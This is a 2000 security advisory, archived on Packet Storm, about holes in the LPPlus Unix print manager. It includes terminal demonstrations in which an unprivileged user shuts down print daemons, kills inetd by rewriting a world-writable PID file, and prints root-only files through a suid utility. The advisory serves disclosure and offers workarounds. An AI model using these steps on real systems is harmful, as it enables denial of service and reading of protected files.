Twenty Year Anniversary

lpplus.txt

lpplus.txt
Posted Sep 18, 2001
Authored by Echo8

LPPlus is Plus Technologies print management system for unix. Versions prior to 3.3.x contain several serious security holes, some of which undermine the integrity of the printing subsystem, others threaten the security of the system on which the product is installed. Upgrade available here.

tags | exploit
systems | unix
MD5 | f8eacbf074a5a8841982762a92fe33dd

lpplus.txt

Change Mirror Download
                 Multiple Security Holes in LPPlus
---------------------------------
echo8, 8/23/2000

Summary
-------

LPPlus is Plus Technologies' print management system for unix. Versions prior
to v3.3.x have several serious security holes, some of which undermine the
integrity of the printing subsystem, some of which threaten the security of
the system on which the product is installed.

Upgrade is available here: mailto:support@plustechnologies.com

Details
-------

Hole #1:

Of the 74 binaries that the installer put on my Solaris system, 26 were
installed suid to root and world-executable. On my linux box, it was 26
out of 64. Several of these should not be suid-root, or should be
group-executable only, and carefully restricted.

For example, the following binaries are installed mode 4755 by the
installer:

$LPHOME/bin/dccsched
$LPHOME/bin/dcclpdser
$LPHOME/bin/dccbkst
$LPHOME/bin/dccshut
$LPHOME/bin/dcclpdshut
$LPHOME/bin/dccbkstshut

The first three start the scheduler, LPD server and network status
daemons, respectively. The next three stop the aforementioned services. In
the default configuration, all six can be executed by any unprivileged
user, effectively giving any user on the system the ability to start and
stop printing services. No checking of userid, group or anything else is
done prior to execution.

Hole #2:

$LPHOME/system/lpdprocess is created mode 777.

This file contains the process ID of the dcclpdser process. The
combination of this file's permissions and the fact that dcclpdshut is
executable by any user allows an unprivileged user to send signal 2
(SIGINT) to any process on the system. All that's required is for an
unprivileged user to replace the PID in $LPHOME/system/lpdprocess with the
PID of their target process and then run $LPHOME/bin/dcclpdshut.

Hole #3:

$LPHOME/bin/dccscan is suid-root and can be executed by any user. It may
allow an unprivileged user to print files to which he does not have read
access. The ramifications are fairly obvious: although an unprivileged
user cannot read /etc/shadow (for example), using this utility, he may be
able to print it out. In my testing, this worked even when sending to
printers to which my user was not given any access in the LPPlus security
configuration (in fact, my test user had no access to ANY printers, or ANY
LPPlus services).

Some other potential holes:

* if the archive module is installed, $LPHOME/bin/dccasweep can be
executed by any user. This may undermine the integrity of the archiving
facility.

* if the web interface is installed, it utilizes a very old beta version
of apache, and the installation requires that the server (and all of
its children, which run as nobody out-of-the-box) run as root.

* on the linux system, $LPHOME was created mode 777. Root's umask was set
to 022. This didn't seem to be the case on the Solaris system, although
the reason for this may be the different version of LPPLUS rather than the
different unixes (see below for version info).

Demonstrations
--------------

Hole #1:

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
$

Hole #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
$

Hole #3:

# id
uid=0(root) gid=1(other)
# ls -alt /root/test
total 6
drwx------ 2 root other 512 Sep 5 17:46 .
-r-------- 1 root other 365 Sep 5 17:46 foo
drwx------ 3 root other 512 Sep 5 17:46 ..
# su - test
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ id
uid=600(test) gid=300(users)
$ ls -alt /root/test
/root/test: Permission denied
$ dccscan /root/test 30 5 "-dlp0"
$

# now, go to the printer and wait for the files to come out, or watch them
# being queued as root, if you have access to dccstat

Vulnerable Versions
-------------------

3.3.0 for Unix (on Solaris 2.6).
3.2.1 for Linux (on Redhat 5.2).
* These are the only versions I had available for testing.

Workarounds
-----------

At this time, no patches or updated versions are available. However, most
of the utilities in question either don't need to be suid, or can be
group-owned by a more restricted group and mode 4750. The web interface
works fine with a newer version of apache, and the web server does not
need to run with all the children spawned as root.

The vendor was notified of these problems on 8/24/2000. They did respond,
confirming the existence of the holes. However, a request for an ETA on an
updated release or patches has thus far been ignored.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    4 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close